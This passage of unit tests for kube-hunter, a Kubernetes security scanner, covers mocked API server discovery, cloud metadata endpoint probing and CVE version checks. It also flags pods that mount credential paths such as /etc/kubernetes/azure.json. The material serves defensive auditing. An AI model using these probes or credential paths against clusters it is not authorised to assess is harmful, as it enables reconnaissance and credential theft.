3 | from kube_hunter.conf import Config, set_config
4 | from kube_hunter.core.types import Hunter
5 | from kube_hunter.core.events.types import Event, Service
6 | from kube_hunter.core.events.event_handler import handler
7 |
8 | counter = 0
9 | first_run = True
10 |
11 | set_config(Config())
12 |
13 |
14 | class OnceOnlyEvent(Service, Event):
15 | def __init__(self):
16 | Service.__init__(self, "Test Once Service")
17 |
18 |
19 | class RegularEvent(Service, Event):
20 | def __init__(self):
21 | Service.__init__(self, "Test Service")
22 |
23 |
24 | class AnotherRegularEvent(Service, Event):
25 | def __init__(self):
26 | Service.__init__(self, "Test Service (another)")
27 |
28 |
29 | class DifferentRegularEvent(Service, Event):
30 | def __init__(self):
31 | Service.__init__(self, "Test Service (different)")
32 |
33 |
34 | @handler.subscribe_once(OnceOnlyEvent)
35 | class OnceHunter(Hunter):
36 | def __init__(self, event):
37 | global counter
38 | counter += 1
39 |
40 |
41 | @handler.subscribe(RegularEvent)
42 | class RegularHunter(Hunter):
43 | def __init__(self, event):
44 | global counter
45 | counter += 1
46 |
47 |
48 | @handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent])
49 | class SmartHunter(Hunter):
50 | def __init__(self, events):
51 | global counter, first_run
52 | counter += 1
53 |
54 |         # An attribute is added to the event on the second scan;
55 |         # here we verify that we receive the latest event
56 | different_event = events.get_by_class(DifferentRegularEvent)
57 | if first_run:
58 | first_run = False
59 | assert not different_event.new_value
60 | else:
61 | assert different_event.new_value
62 |
63 |
64 | @handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent])
65 | class SmartHunter2(Hunter):
66 | def __init__(self, events):
67 | global counter
68 | counter += 1
69 |
70 | # check if we can access the events
71 | assert events.get_by_class(DifferentRegularEvent).__class__ == DifferentRegularEvent
72 | assert events.get_by_class(AnotherRegularEvent).__class__ == AnotherRegularEvent
73 |
74 |
75 | def test_subscribe_mechanism():
76 | global counter
77 | counter = 0
78 |
79 | # first test normal subscribe and publish works
80 | handler.publish_event(RegularEvent())
81 | handler.publish_event(RegularEvent())
82 | handler.publish_event(RegularEvent())
83 |
84 | time.sleep(0.02)
85 | assert counter == 3
86 |
87 |
88 | def test_subscribe_once_mechanism():
89 | global counter
90 | counter = 0
91 |
92 |     # testing the subscribe-once mechanism
93 | handler.publish_event(OnceOnlyEvent())
94 |
95 | time.sleep(0.02)
96 | assert counter == 1
97 | counter = 0
98 |
99 | handler.publish_event(OnceOnlyEvent())
100 | handler.publish_event(OnceOnlyEvent())
101 | handler.publish_event(OnceOnlyEvent())
102 | time.sleep(0.02)
103 |
104 | assert counter == 0
105 |
106 |
107 | def test_subscribe_many_mechanism():
108 | global counter
109 | counter = 0
110 |
111 | # testing the multiple subscription mechanism
112 | handler.publish_event(DifferentRegularEvent())
113 | handler.publish_event(DifferentRegularEvent())
114 | handler.publish_event(DifferentRegularEvent())
115 | handler.publish_event(DifferentRegularEvent())
116 | handler.publish_event(DifferentRegularEvent())
117 | handler.publish_event(AnotherRegularEvent())
118 |
119 | time.sleep(0.02)
120 |     # We expect SmartHunter and SmartHunter2 each to be executed once, hence the counter should be 2
121 | assert counter == 2
122 | counter = 0
123 |
124 | # Test using most recent event
125 | newer_version_event = DifferentRegularEvent()
126 | newer_version_event.new_value = True
127 | handler.publish_event(newer_version_event)
128 |
129 | assert counter == 2
130 |
--------------------------------------------------------------------------------
/tests/discovery/test_apiserver.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import requests_mock
3 | import time
4 |
5 | from kube_hunter.conf import Config, set_config
6 |
7 | set_config(Config())
8 |
9 | from kube_hunter.modules.discovery.apiserver import ApiServer, ApiServiceDiscovery
10 | from kube_hunter.core.events.types import Event
11 | from kube_hunter.core.events.event_handler import handler
12 |
13 | counter = 0
14 |
15 |
16 | def test_ApiServer():
17 | global counter
18 | counter = 0
19 | with requests_mock.Mocker() as m:
20 | m.get("https://mockOther:443", text="elephant")
21 | m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
22 | m.get(
23 | "https://mockKubernetes:443/version",
24 | text='{"major": "1.14.10"}',
25 | status_code=200,
26 | )
27 |
28 | e = Event()
29 | e.protocol = "https"
30 | e.port = 443
31 | e.host = "mockOther"
32 |
33 | a = ApiServiceDiscovery(e)
34 | a.execute()
35 |
36 | e.host = "mockKubernetes"
37 | a.execute()
38 |
39 | # Allow the events to be processed. Only the one to mockKubernetes should trigger an event
40 | time.sleep(1)
41 | assert counter == 1
42 |
43 |
44 | def test_ApiServerWithServiceAccountToken():
45 | global counter
46 | counter = 0
47 | with requests_mock.Mocker() as m:
48 | m.get(
49 | "https://mockKubernetes:443",
50 | request_headers={"Authorization": "Bearer very_secret"},
51 | text='{"code":200}',
52 | )
53 | m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
54 | m.get(
55 | "https://mockKubernetes:443/version",
56 | text='{"major": "1.14.10"}',
57 | status_code=200,
58 | )
59 | m.get("https://mockOther:443", text="elephant")
60 |
61 | e = Event()
62 | e.protocol = "https"
63 | e.port = 443
64 |
65 | # We should discover an API Server regardless of whether we have a token
66 | e.host = "mockKubernetes"
67 | a = ApiServiceDiscovery(e)
68 | a.execute()
69 | time.sleep(0.1)
70 | assert counter == 1
71 |
72 | e.auth_token = "very_secret"
73 | a = ApiServiceDiscovery(e)
74 | a.execute()
75 | time.sleep(0.1)
76 | assert counter == 2
77 |
78 | # But we shouldn't generate an event if we don't see an error code or find the 'major' in /version
79 | e.host = "mockOther"
80 | a = ApiServiceDiscovery(e)
81 | a.execute()
82 | time.sleep(0.1)
83 | assert counter == 2
84 |
85 |
86 | def test_InsecureApiServer():
87 | global counter
88 | counter = 0
89 | with requests_mock.Mocker() as m:
90 | m.get("http://mockOther:8080", text="elephant")
91 | m.get(
92 | "http://mockKubernetes:8080",
93 | text="""{
94 | "paths": [
95 | "/api",
96 | "/api/v1",
97 | "/apis",
98 | "/apis/",
99 | "/apis/admissionregistration.k8s.io",
100 | "/apis/admissionregistration.k8s.io/v1beta1",
101 | "/apis/apiextensions.k8s.io"
102 | ]}""",
103 | )
104 |
105 | m.get("http://mockKubernetes:8080/version", text='{"major": "1.14.10"}')
106 | m.get("http://mockOther:8080/version", status_code=404)
107 |
108 | e = Event()
109 | e.protocol = "http"
110 | e.port = 8080
111 | e.host = "mockOther"
112 |
113 | a = ApiServiceDiscovery(e)
114 | a.execute()
115 |
116 | e.host = "mockKubernetes"
117 | a.execute()
118 |
119 | # Allow the events to be processed. Only the one to mockKubernetes should trigger an event
120 | time.sleep(0.1)
121 | assert counter == 1
122 |
123 |
124 | # We should only generate an ApiServer event for a response that looks like it came from a Kubernetes node
125 | @handler.subscribe(ApiServer)
126 | class testApiServer:
127 | def __init__(self, event):
128 | print("Event")
129 | assert event.host == "mockKubernetes"
130 | global counter
131 | counter += 1
132 |
--------------------------------------------------------------------------------
/tests/discovery/test_hosts.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.modules.discovery.hosts import (
3 | FromPodHostDiscovery,
4 | RunningAsPodEvent,
5 | HostScanEvent,
6 | HostDiscoveryHelpers,
7 | )
8 | from kube_hunter.core.types import Hunter
9 | from kube_hunter.core.events.event_handler import handler
10 | import json
11 | import requests_mock
12 | import pytest
13 |
14 | from netaddr import IPNetwork, IPAddress
15 | from typing import List
16 | from kube_hunter.conf import Config, get_config, set_config
17 |
18 | set_config(Config())
19 |
20 |
21 | class TestFromPodHostDiscovery:
22 | @staticmethod
23 | def _make_azure_response(*subnets: List[tuple]) -> str:
24 | return json.dumps(
25 | {
26 | "network": {
27 | "interface": [
28 | {"ipv4": {"subnet": [{"address": address, "prefix": prefix} for address, prefix in subnets]}}
29 | ]
30 | }
31 | }
32 | )
33 |
34 | @staticmethod
35 | def _make_aws_response(*data: List[str]) -> str:
36 | return "\n".join(data)
37 |
38 | def test_is_azure_pod_request_fail(self):
39 | f = FromPodHostDiscovery(RunningAsPodEvent())
40 |
41 | with requests_mock.Mocker() as m:
42 | m.get("http://169.254.169.254/metadata/instance?api-version=2017-08-01", status_code=404)
43 | result = f.is_azure_pod()
44 |
45 | assert not result
46 |
47 | def test_is_azure_pod_success(self):
48 | f = FromPodHostDiscovery(RunningAsPodEvent())
49 |
50 | with requests_mock.Mocker() as m:
51 | m.get(
52 | "http://169.254.169.254/metadata/instance?api-version=2017-08-01",
53 | text=TestFromPodHostDiscovery._make_azure_response(("3.4.5.6", "255.255.255.252")),
54 | )
55 | result = f.is_azure_pod()
56 |
57 | assert result
58 |
59 | def test_is_aws_pod_v1_request_fail(self):
60 | f = FromPodHostDiscovery(RunningAsPodEvent())
61 |
62 | with requests_mock.Mocker() as m:
63 | m.get("http://169.254.169.254/latest/meta-data/", status_code=404)
64 | result = f.is_aws_pod_v1()
65 |
66 | assert not result
67 |
68 | def test_is_aws_pod_v1_success(self):
69 | f = FromPodHostDiscovery(RunningAsPodEvent())
70 |
71 | with requests_mock.Mocker() as m:
72 | m.get(
73 | "http://169.254.169.254/latest/meta-data/",
74 | text=TestFromPodHostDiscovery._make_aws_response(
75 | "\n".join(
76 | (
77 | "ami-id",
78 | "ami-launch-index",
79 | "ami-manifest-path",
80 | "block-device-mapping/",
81 | "events/",
82 | "hostname",
83 | "iam/",
84 | "instance-action",
85 | "instance-id",
86 | "instance-type",
87 | "local-hostname",
88 | "local-ipv4",
89 | "mac",
90 | "metrics/",
91 | "network/",
92 | "placement/",
93 | "profile",
94 | "public-hostname",
95 | "public-ipv4",
96 | "public-keys/",
97 | "reservation-id",
98 | "security-groups",
99 | "services/",
100 | )
101 | ),
102 | ),
103 | )
104 | result = f.is_aws_pod_v1()
105 |
106 | assert result
107 |
108 | def test_is_aws_pod_v2_request_fail(self):
109 | f = FromPodHostDiscovery(RunningAsPodEvent())
110 |
111 | with requests_mock.Mocker() as m:
112 | m.put(
113 | "http://169.254.169.254/latest/api/token/",
114 | headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
115 | status_code=404,
116 | )
117 | m.get(
118 | "http://169.254.169.254/latest/meta-data/",
119 | headers={"X-aws-ec2-metatadata-token": "token"},
120 | status_code=404,
121 | )
122 | result = f.is_aws_pod_v2()
123 |
124 | assert not result
125 |
126 | def test_is_aws_pod_v2_success(self):
127 | f = FromPodHostDiscovery(RunningAsPodEvent())
128 |
129 | with requests_mock.Mocker() as m:
130 | m.put(
131 | "http://169.254.169.254/latest/api/token/",
132 |                 headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
133 | text=TestFromPodHostDiscovery._make_aws_response("token"),
134 | )
135 | m.get(
136 | "http://169.254.169.254/latest/meta-data/",
137 |                 headers={"X-aws-ec2-metadata-token": "token"},
138 | text=TestFromPodHostDiscovery._make_aws_response(
139 | "\n".join(
140 | (
141 | "ami-id",
142 | "ami-launch-index",
143 | "ami-manifest-path",
144 | "block-device-mapping/",
145 | "events/",
146 | "hostname",
147 | "iam/",
148 | "instance-action",
149 | "instance-id",
150 | "instance-type",
151 | "local-hostname",
152 | "local-ipv4",
153 | "mac",
154 | "metrics/",
155 | "network/",
156 | "placement/",
157 | "profile",
158 | "public-hostname",
159 | "public-ipv4",
160 | "public-keys/",
161 | "reservation-id",
162 | "security-groups",
163 | "services/",
164 | )
165 | ),
166 | ),
167 | )
168 | result = f.is_aws_pod_v2()
169 |
170 | assert result
171 |
172 | def test_execute_scan_cidr(self):
173 | set_config(Config(cidr="1.2.3.4/30"))
174 | f = FromPodHostDiscovery(RunningAsPodEvent())
175 | f.execute()
176 |
177 | def test_execute_scan_remote(self):
178 | set_config(Config(remote="1.2.3.4"))
179 | f = FromPodHostDiscovery(RunningAsPodEvent())
180 | f.execute()
181 |
182 |
183 | @handler.subscribe(HostScanEvent)
184 | class HunterTestHostDiscovery(Hunter):
185 | """TestHostDiscovery
186 |     In this set of tests, HostScanEvent should only be triggered when remote or cidr is set.
187 | """
188 |
189 | def __init__(self, event):
190 | config = get_config()
191 | assert config.remote is not None or config.cidr is not None
192 | assert config.remote == "1.2.3.4" or config.cidr == "1.2.3.4/30"
193 |
194 |
195 | class TestDiscoveryUtils:
196 | @staticmethod
197 | def test_generate_hosts_valid_cidr():
198 | test_cidr = "192.168.0.0/24"
199 | expected = set(IPNetwork(test_cidr))
200 |
201 | actual = set(HostDiscoveryHelpers.generate_hosts([test_cidr]))
202 |
203 | assert actual == expected
204 |
205 | @staticmethod
206 | def test_generate_hosts_valid_ignore():
207 | remove = IPAddress("192.168.1.8")
208 | scan = "192.168.1.0/24"
209 | expected = {ip for ip in IPNetwork(scan) if ip != remove}
210 |
211 | actual = set(HostDiscoveryHelpers.generate_hosts([scan, f"!{str(remove)}"]))
212 |
213 | assert actual == expected
214 |
215 | @staticmethod
216 | def test_generate_hosts_invalid_cidr():
217 | with pytest.raises(ValueError):
218 | list(HostDiscoveryHelpers.generate_hosts(["192..2.3/24"]))
219 |
220 | @staticmethod
221 | def test_generate_hosts_invalid_ignore():
222 | with pytest.raises(ValueError):
223 | list(HostDiscoveryHelpers.generate_hosts(["192.168.1.8", "!29.2..1/24"]))
224 |
--------------------------------------------------------------------------------
/tests/discovery/test_k8s.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.conf import Config, set_config
2 |
3 | from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes
4 | from unittest.mock import MagicMock, patch
5 |
6 | set_config(Config())
7 |
8 |
9 | def test_client_yields_ips():
10 | client = MagicMock()
11 | response = MagicMock()
12 | client.list_node.return_value = response
13 | response.items = [MagicMock(), MagicMock()]
14 | response.items[0].status.addresses = [MagicMock(), MagicMock()]
15 | response.items[0].status.addresses[0].address = "127.0.0.1"
16 | response.items[0].status.addresses[1].address = "127.0.0.2"
17 | response.items[1].status.addresses = [MagicMock()]
18 | response.items[1].status.addresses[0].address = "127.0.0.3"
19 |
20 | with patch("kubernetes.config.load_incluster_config") as m:
21 | output = list(list_all_k8s_cluster_nodes(client=client))
22 | m.assert_called_once()
23 |
24 | assert output == ["127.0.0.1", "127.0.0.2", "127.0.0.3"]
25 |
26 |
27 | def test_client_uses_kubeconfig():
28 | with patch("kubernetes.config.load_kube_config") as m:
29 | list(list_all_k8s_cluster_nodes(kube_config="/location", client=MagicMock()))
30 | m.assert_called_once_with(config_file="/location")
31 |
--------------------------------------------------------------------------------
/tests/hunting/test_aks.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import requests_mock
3 |
4 | from kube_hunter.conf import Config, set_config
5 |
6 | import json
7 |
8 | set_config(Config())
9 |
10 | from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler
11 | from kube_hunter.modules.hunting.aks import AzureSpnHunter
12 |
13 |
14 | def test_AzureSpnHunter():
15 | e = ExposedPodsHandler(pods=[])
16 | pod_template = '{{"items":[ {{"apiVersion":"v1","kind":"Pod","metadata":{{"name":"etc","namespace":"default"}},"spec":{{"containers":[{{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{{"mountPath":"/mp","name":"v"}}]}}],"volumes":[{{"hostPath":{{"path":"{}"}},"name":"v"}}]}}}} ]}}'
17 |
18 | bad_paths = ["/", "/etc", "/etc/", "/etc/kubernetes", "/etc/kubernetes/azure.json"]
19 | good_paths = ["/yo", "/etc/yo", "/etc/kubernetes/yo.json"]
20 |
21 | for p in bad_paths:
22 | e.pods = json.loads(pod_template.format(p))["items"]
23 | h = AzureSpnHunter(e)
24 | c = h.get_key_container()
25 | assert c
26 |
27 | for p in good_paths:
28 | e.pods = json.loads(pod_template.format(p))["items"]
29 | h = AzureSpnHunter(e)
30 | c = h.get_key_container()
31 |         assert c is None
32 |
33 | pod_no_volume_mounts = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}],"volumes":[{"hostPath":{"path":"/whatever"},"name":"v"}]}} ]}'
34 | e.pods = json.loads(pod_no_volume_mounts)["items"]
35 | h = AzureSpnHunter(e)
36 | c = h.get_key_container()
37 |     assert c is None
38 |
39 | pod_no_volumes = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}]}} ]}'
40 | e.pods = json.loads(pod_no_volumes)["items"]
41 | h = AzureSpnHunter(e)
42 | c = h.get_key_container()
43 |     assert c is None
44 |
45 | pod_other_volume = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{"mountPath":"/mp","name":"v"}]}],"volumes":[{"emptyDir":{},"name":"v"}]}} ]}'
46 | e.pods = json.loads(pod_other_volume)["items"]
47 | h = AzureSpnHunter(e)
48 | c = h.get_key_container()
49 |     assert c is None
50 |
--------------------------------------------------------------------------------
/tests/hunting/test_certificates.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.conf import Config, set_config
3 |
4 | set_config(Config())
5 |
6 | from kube_hunter.core.events.types import Event
7 | from kube_hunter.modules.hunting.certificates import CertificateDiscovery, CertificateEmail
8 | from kube_hunter.core.events.event_handler import handler
9 |
10 |
11 | def test_CertificateDiscovery():
12 | cert = """
13 | -----BEGIN CERTIFICATE-----
14 | MIIDZDCCAkwCCQCAzfCLqrJvuTANBgkqhkiG9w0BAQsFADB0MQswCQYDVQQGEwJV
15 | UzELMAkGA1UECAwCQ0ExEDAOBgNVBAoMB05vZGUuanMxETAPBgNVBAsMCG5vZGUt
16 | Z3lwMRIwEAYDVQQDDAlsb2NhbGhvc3QxHzAdBgkqhkiG9w0BCQEWEGJ1aWxkQG5v
17 | ZGVqcy5vcmcwHhcNMTkwNjIyMDYyMjMzWhcNMjIwNDExMDYyMjMzWjB0MQswCQYD
18 | VQQGEwJVUzELMAkGA1UECAwCQ0ExEDAOBgNVBAoMB05vZGUuanMxETAPBgNVBAsM
19 | CG5vZGUtZ3lwMRIwEAYDVQQDDAlsb2NhbGhvc3QxHzAdBgkqhkiG9w0BCQEWEGJ1
20 | aWxkQG5vZGVqcy5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDS
21 | CHjvtVW4HdbbUwZ/ZV9s6U4x0KSoyNQrsCZjB8kRpFPe50DS5mfmu2SNBGYKRgzk
22 | 4QEEwFB9N2o8YTWsCefSRl6ti4ToPZqulU4hhRKYrEGtMJcRzi3IN7s200JaO3UH
23 | 01Su8ruO0NESb5zEU1Ykfh8Lub8TGEAINmgI61d/5d5Aq3kDjUHQJt1Ekw03Ylnu
24 | juQyCGZxLxnngu0mIvwzyL/UeeUgsfQLzvppUk6In7tC1zzMjSPWo0c8qu6KvrW4
25 | bKYnkZkzdQifzbpO5ERMEsh5HWq0uHa6+dgcVHFvlhdqF4Uat87ygNplVf0txsZB
26 | MNVqbz1k6xkZYMnzDoydAgMBAAEwDQYJKoZIhvcNAQELBQADggEBADspZGtKpWxy
27 | J1W3FA1aeQhMvequQTcMRz4avkm4K4HfTdV1iVD4CbvdezBphouBlyLVLDFJP7RZ
28 | m7dBJVgBwnxufoFLne8cR2MGqDRoySbFT1AtDJdxabE6Fg+QGUpgOQfeBJ6ANlSB
29 | +qJ+HG4QA+Ouh5hxz9mgYwkIsMUABHiwENdZ/kT8Edw4xKgd3uH0YP4iiePMD66c
30 | rzW3uXH5J1jnKgBlpxtog4P6dHCcoq+PZJ17W5bdXNyqC1LPzQqniZ2BNcEZ4ix3
31 | slAZAOWD1zLLGJhBPMV1fa0sHNBWc6oicr3YK/IDb0cp9kiLvnUu1pHy+LWQGqtC
32 | rceJuGsnJEQ=
33 | -----END CERTIFICATE-----
34 | """
35 | c = CertificateDiscovery(Event())
36 | c.examine_certificate(cert)
37 |
38 |
39 | @handler.subscribe(CertificateEmail)
40 | class test_CertificateEmail:
41 | def __init__(self, event):
42 | assert event.email == b"build@nodejs.org0"
43 |
--------------------------------------------------------------------------------
/tests/hunting/test_cvehunting.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import time
3 |
4 | from kube_hunter.conf import Config, set_config
5 |
6 | set_config(Config())
7 |
8 | from kube_hunter.core.events.event_handler import handler
9 | from kube_hunter.core.events.types import K8sVersionDisclosure
10 | from kube_hunter.modules.hunting.cves import (
11 | K8sClusterCveHunter,
12 | ServerApiVersionEndPointAccessPE,
13 | ServerApiVersionEndPointAccessDos,
14 | CveUtils,
15 | )
16 |
17 | cve_counter = 0
18 |
19 |
20 | def test_K8sCveHunter():
21 | global cve_counter
22 |     # because the hunter unregisters itself, we override __new__ to bypass that so we can test it
23 | K8sClusterCveHunter.__new__ = lambda self, cls: object.__new__(self)
24 |
25 | e = K8sVersionDisclosure(version="1.10.1", from_endpoint="/version")
26 | h = K8sClusterCveHunter(e)
27 | h.execute()
28 |
29 | time.sleep(0.01)
30 | assert cve_counter == 2
31 | cve_counter = 0
32 |
33 | # test patched version
34 | e = K8sVersionDisclosure(version="v1.13.6-gke.13", from_endpoint="/version")
35 | h = K8sClusterCveHunter(e)
36 | h.execute()
37 |
38 | time.sleep(0.01)
39 | assert cve_counter == 0
40 | cve_counter = 0
41 |
42 |
43 | @handler.subscribe(ServerApiVersionEndPointAccessPE)
44 | class test_CVE_2018_1002105:
45 | def __init__(self, event):
46 | global cve_counter
47 | cve_counter += 1
48 |
49 |
50 | @handler.subscribe(ServerApiVersionEndPointAccessDos)
51 | class test_CVE_2019_1002100:
52 | def __init__(self, event):
53 | global cve_counter
54 | cve_counter += 1
55 |
56 |
57 | class TestCveUtils:
58 | def test_is_downstream(self):
59 | test_cases = (
60 | ("1", False),
61 | ("1.2", False),
62 | ("1.2-3", True),
63 | ("1.2-r3", True),
64 | ("1.2+3", True),
65 | ("1.2~3", True),
66 | ("1.2+a3f5cb2", True),
67 | ("1.2-9287543", True),
68 | ("v1", False),
69 | ("v1.2", False),
70 | ("v1.2-3", True),
71 | ("v1.2-r3", True),
72 | ("v1.2+3", True),
73 | ("v1.2~3", True),
74 | ("v1.2+a3f5cb2", True),
75 | ("v1.2-9287543", True),
76 | ("v1.13.9-gke.3", True),
77 | )
78 |
79 | for version, expected in test_cases:
80 | actual = CveUtils.is_downstream_version(version)
81 | assert actual == expected
82 |
83 | def test_ignore_downstream(self):
84 | test_cases = (
85 | ("v2.2-abcd", ["v1.1", "v2.3"], False),
86 | ("v2.2-abcd", ["v1.1", "v2.2"], False),
87 | ("v1.13.9-gke.3", ["v1.14.8"], False),
88 | )
89 |
90 | for check_version, fix_versions, expected in test_cases:
91 | actual = CveUtils.is_vulnerable(fix_versions, check_version, True)
92 | assert actual == expected
93 |
--------------------------------------------------------------------------------
/tests/hunting/test_dashboard.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 | from types import SimpleNamespace
4 | from requests_mock import Mocker
5 | from kube_hunter.conf import Config, set_config
6 |
7 | set_config(Config())
8 |
9 | from kube_hunter.modules.hunting.dashboard import KubeDashboard # noqa: E402
10 |
11 |
12 | class TestKubeDashboard:
13 | @staticmethod
14 | def get_nodes_mock(result: dict, **kwargs):
15 | with Mocker() as m:
16 | m.get("http://mockdashboard:8000/api/v1/node", text=json.dumps(result), **kwargs)
17 | hunter = KubeDashboard(SimpleNamespace(host="mockdashboard", port=8000))
18 | return hunter.get_nodes()
19 |
20 | @staticmethod
21 | def test_get_nodes_with_result():
22 | nodes = {"nodes": [{"objectMeta": {"name": "node1"}}]}
23 | expected = ["node1"]
24 | actual = TestKubeDashboard.get_nodes_mock(nodes)
25 |
26 | assert expected == actual
27 |
28 | @staticmethod
29 | def test_get_nodes_without_result():
30 | nodes = {"nodes": []}
31 | expected = []
32 | actual = TestKubeDashboard.get_nodes_mock(nodes)
33 |
34 | assert expected == actual
35 |
36 | @staticmethod
37 | def test_get_nodes_invalid_result():
38 | expected = None
39 | actual = TestKubeDashboard.get_nodes_mock(dict(), status_code=404)
40 |
41 | assert expected == actual
42 |
--------------------------------------------------------------------------------
/tests/modules/test_reports.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.conf import Config, set_config
3 |
4 | set_config(Config())
5 |
6 | from kube_hunter.modules.report import get_reporter, get_dispatcher
7 | from kube_hunter.modules.report.factory import (
8 | YAMLReporter,
9 | JSONReporter,
10 | PlainReporter,
11 | HTTPDispatcher,
12 | STDOUTDispatcher,
13 | )
14 |
15 |
16 | def test_reporters():
17 | test_cases = [
18 | ("plain", PlainReporter),
19 | ("json", JSONReporter),
20 | ("yaml", YAMLReporter),
21 | ("notexists", PlainReporter),
22 | ]
23 |
24 | for report_type, expected in test_cases:
25 | actual = get_reporter(report_type)
26 | assert type(actual) is expected
27 |
28 |
29 | def test_dispatchers():
30 | test_cases = [
31 | ("stdout", STDOUTDispatcher),
32 | ("http", HTTPDispatcher),
33 | ("notexists", STDOUTDispatcher),
34 | ]
35 |
36 | for dispatcher_type, expected in test_cases:
37 | actual = get_dispatcher(dispatcher_type)
38 | assert type(actual) is expected
39 |
--------------------------------------------------------------------------------
/tests/plugins/test_hooks.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.plugins import hookimpl
2 |
3 | return_string = "return_string"
4 |
5 |
6 | @hookimpl
7 | def parser_add_arguments(parser):
8 | return return_string
9 |
10 |
11 | @hookimpl
12 | def load_plugin(args):
13 | return return_string
14 |
--------------------------------------------------------------------------------
/tests/plugins/test_plugins_hooks.py:
--------------------------------------------------------------------------------
1 | from argparse import ArgumentParser
2 | from tests.plugins import test_hooks
3 | from kube_hunter.plugins import initialize_plugin_manager
4 |
5 |
6 | def test_all_plugin_hooks():
7 | pm = initialize_plugin_manager()
8 | pm.register(test_hooks)
9 |
10 | # Testing parser_add_arguments
11 | parser = ArgumentParser("Test Argument Parser")
12 | results = pm.hook.parser_add_arguments(parser=parser)
13 | assert test_hooks.return_string in results
14 |
15 | # Testing load_plugin
16 | results = pm.hook.load_plugin(args=[])
17 | assert test_hooks.return_string in results
18 |
--------------------------------------------------------------------------------